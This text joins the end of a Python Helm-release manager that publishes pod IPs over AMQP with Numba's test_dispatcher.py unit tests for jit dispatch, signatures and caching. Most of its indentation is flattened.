response_list = json.loads(response.text)
logging.info("RESPONSE LIST %s" % (response_list))
for ns_element in response_list:
for pod_name, pod_ip in ns_element.items():
if release_name in pod_name:
ns_ip = pod_ip
        if release_name == chart_name:
            for count, app in enumerate(self.message_to_publish["apps"],0):
                if app["appName"] == release_name:
chart_name = self.message_to_publish["apps"][count]["helm-chart"]
self.message_to_publish["apps"].append({"appName":release_name, "helm-chart": chart_name, "ip": ns_ip})
publish_topic = self.topic[release_name]
logging.info("Publishing topic %s" % (publish_topic))
logging.info("Pubishing message %s" % (self.message_to_publish))
self.publish_ip(publish_topic, self.message_to_publish)
release = {"k8s_code": k8s_code,
"chart_dir": chart_dir,
"status": "deployed"}
self.releases[release_name] = release
return release, self.message_to_publish
def uninstall(self, release_name, **kwargs):
logging.info("WITHIN UNINSTALL self.root %s" % (self.root))
url = "%s/api/v1/delete/app/%s" % (self.root[release_name], release_name)
response = requests.delete(url)
if response.status_code != 200:
raise ValueError("Error from NEC Edge API")
        # Iterate over a copy so that entries can be removed safely
        for count, app in enumerate(list(self.message_to_publish["apps"]), 0):
            if app["appName"] in release_name:
                self.message_to_publish["apps"].remove(app)
logging.info("Deleting IP of %s" % (release_name))
publish_topic = self.topic[release_name]
self.publish_ip(publish_topic, self.message_to_publish)
del self.releases[release_name]
return None, None
def status(self, release_name, **kwargs):
return self._get_release(release_name), None
def get_values(self, release_name, **kwargs):
release = self.releases[release_name]
raw, _ = self.show_info(release_name, "values",
chart_dir=release["chart_dir"])
values = yaml.load(raw, yaml.SafeLoader)
return values, None
def _get_releases(self):
out_releases = []
for release_name in self.releases:
out_release = self._get_release(release_name, extended=False)
out_releases.append(out_release)
return out_releases
def _get_release(self, release_name, extended=True):
release_data = self.releases[release_name]
out_release = dict()
out_release["name"] = release_name
out_release["status"] = release_data["status"]
if extended:
out_release["k8s_code"] = release_data["k8s_code"]
return out_release
def publish_ip(self, publish_topic, publish_msg):
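        # Run a short-lived Qpid Proton container in a background thread
        # to publish the message on the given AMQP topic.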
client = Producer(broker_endpoint, publish_topic, publish_msg)
container = Container(client)
events = EventInjector()
container.selectable(events)
qpid_thread = Thread(target=container.run)
qpid_thread.start()
logging.info("DONE PUBLISHING!!!")
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof, errors
from numba import _dispatcher
from numba.compiler import compile_isolated
from numba.errors import NumbaWarning
from .support import (TestCase, tag, temp_directory, import_dynamic,
override_env_config, capture_cache_log, captured_stdout)
from numba.numpy_support import as_dtype
from numba.targets import codegen
from numba.caching import _UserWideCacheLocator
from numba.dispatcher import Dispatcher
from numba import parfor
from .test_linalg import needs_lapack
from .support import skip_parfors_unsupported
import llvmlite.binding as ll
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
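    # generated_jit target: resolve the output dtype at compile time,
    # either by promoting the two input array dtypes (when dtype is
    # omitted/None) or from an explicitly passed dtype.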
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
        # do we get the same object even if we delete all the explicit
        # references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as the Cartesian product of:
        # [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as the Cartesian product of:
        # [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as the Cartesian product of:
        # [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
    Same as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
@tag('important')
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=utils.StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
        This tests an issue with the dispatcher when an array that is both
        C and F contiguous is supplied as the first signature.
        The dispatcher checks for F contiguity first but the compiler checks
        for C contiguity first, so C-contiguous code ends up registered as
        the F-contiguous specialization.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
        # Also stresses issue #1603: an uncached function calling a cached
        # function shouldn't fail to compile.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: "
"stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
